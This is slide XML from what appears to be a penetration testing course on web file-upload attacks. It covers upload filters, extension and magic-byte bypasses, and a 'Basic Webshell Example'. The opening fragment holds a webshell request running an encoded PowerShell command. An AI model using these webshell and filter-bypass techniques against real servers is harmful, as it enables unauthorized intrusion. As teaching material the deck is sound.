              </a:rPr>
              <a:t>webshell.php&amp;cmd</a:t>
            </a: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=powershell.exe%20-enc%20SQBFAFgAKABu...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4425C501-2E26-4C41-BB80-43DE021745BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2051133" y="2474723"/>
            <a:ext cx="7906853" cy="2000529"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295558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D3B174-FDD6-43AC-B326-B29670916F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90B8072-D181-4027-A7B6-98C40750E462}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Things to Look For</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99034858-4BA9-4848-B822-A5480769E08E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295399"/>
            <a:ext cx="5681661" cy="1740031"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software documentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default credentials, hidden portals, upload functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7915F944-5269-41AD-901C-04D8E636E007}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6218497" y="4055072"/>
            <a:ext cx="5265246" cy="1938474"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14FD995C-F7DA-4605-9BEE-419258E4319E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6218497" y="1280026"/>
            <a:ext cx="5265246" cy="1230198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{624304B6-2FCC-4256-B221-1B840E6E3898}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="4624161"/>
            <a:ext cx="5113491" cy="1047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500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst/>
              <a:defRPr lang="en-US" sz="2400" b="1" i="0" kern="1200" cap="none" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial Narrow" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst/>
              <a:defRPr lang="en-US" sz="2400" b="0" i="0" kern="1200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial Narrow" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="571500" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst/>
              <a:defRPr lang="en-US" sz="2200" b="0" i="0" kern="1200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial Narrow" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="685800" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst/>
              <a:defRPr lang="en-US" sz="2000" b="0" i="0" kern="1200" baseline="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rPr>
              <a:t>Open-source code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="1" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>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rPr>
              <a:t>Logic flaws, how input is filtered</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A10CDC3-D129-4396-9BF4-42386D003ADE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8486775" y="4270846"/>
            <a:ext cx="3078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a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>UNFILTERED USER INPUT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6C0EF7E-F94E-4444-919B-59E6ED976B00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8943975" y="4640178"/>
            <a:ext cx="1082100" cy="6842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836E3-07CF-486F-96AA-DC787FA57D0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8943975" y="4640178"/>
            <a:ext cx="1082100" cy="8366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454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Uploads and Filters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3534360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9098DCC-F0BE-4345-9C53-DECD791BB5AB}"/>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A7588A00-55E7-4045-A490-252BA08DA942}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3"/>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94A166B7-219B-4172-91BF-FC387D9A5866}"/>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7552959-76FA-4DD0-AA4C-299C731CF5F4}"/>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E2AD18AD-B00B-4781-A52B-446508BED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EC41605A-88E2-41EF-9A27-918A26D272A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File Uploads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D19C8ED7-CFFA-408D-AEC6-A9FB1F3DE433}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="8183010" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uploading files is common in web apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As an attacker, hope for user-level, but may need admin privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Determine the server type to find what files will work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generally -- Apache: php; IIS: asp/x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not always easy – there may be filters in place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May also have to find where the file went</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Directory traversal, directory busting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1878895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9098DCC-F0BE-4345-9C53-DECD791BB5AB}"/>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A7588A00-55E7-4045-A490-252BA08DA942}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2"/>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94A166B7-219B-4172-91BF-FC387D9A5866}"/>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7552959-76FA-4DD0-AA4C-299C731CF5F4}"/>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E2AD18AD-B00B-4781-A52B-446508BED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EC41605A-88E2-41EF-9A27-918A26D272A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Filters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D19C8ED7-CFFA-408D-AEC6-A9FB1F3DE433}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="7666175" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sites may only accept certain file types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic filters simply look at the name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easily circumvented, especially if the check is done on the client side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can sometimes avoid the filter by using other extensions of the same class: e.g., php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> php5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>More advanced filters look at magic bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Need to modify the file binary itself to bypass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1510679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E0B21D-A591-413D-8FB1-FC5FA3A919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ADA8A7CC-9CFC-4FF6-AA1E-21A42E4BBC5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E78F33D-988F-42FB-9F1F-89321A3D90FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3381168" y="1381745"/>
            <a:ext cx="5648325" cy="2524125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1781F011-1525-4860-8295-A762AE543B62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2100412" y="4304516"/>
            <a:ext cx="8011643" cy="1171739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{618D2F9A-235A-49CA-BC7A-CB9D7189CEAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3723934" y="3401171"/>
            <a:ext cx="2736501" cy="345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3C8B9343-76A3-4A7E-B760-B7537A904308}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5913856" y="4304516"/>
            <a:ext cx="2623857" cy="345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85928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FF7A17-31E6-4A84-82F9-CDA4738599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F580A32-61F8-4551-8183-F933C3A605B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic Filter Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03EEBC83-3977-4A10-BB92-3935A7277320}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="434050" y="1310366"/>
            <a:ext cx="5811061" cy="1571844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2C5A2E4-319E-44F0-9A00-53B77AFC4E25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="463720" y="3616378"/>
            <a:ext cx="6583124" cy="818671"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD58FF57-9FDA-4F84-A4F7-D27C03769C85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4652166" y="3949345"/>
            <a:ext cx="2016992"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8F862D63-EDAB-4834-8455-5853C2C503DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7245662" y="1395000"/>
            <a:ext cx="3112930" cy="1389038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Arrow: Right 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D9B7164-7AA1-4C07-8FE4-F1CD27621A37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6365128" y="1846010"/>
            <a:ext cx="775288" cy="487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E0062FF7-66C0-4D18-8A91-542944B0068D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="59096" t="84325" r="7665"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8332332" y="3744465"/>
            <a:ext cx="3134717" cy="648662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Arrow: Right 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7574F2D-E0DC-4788-BD24-BB708B23514B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7359305" y="3782204"/>
            <a:ext cx="775288" cy="487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pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A7724C1-7868-438C-BD90-AABAFE7BF198}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3122522" y="4801259"/>
            <a:ext cx="5658640" cy="1467055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
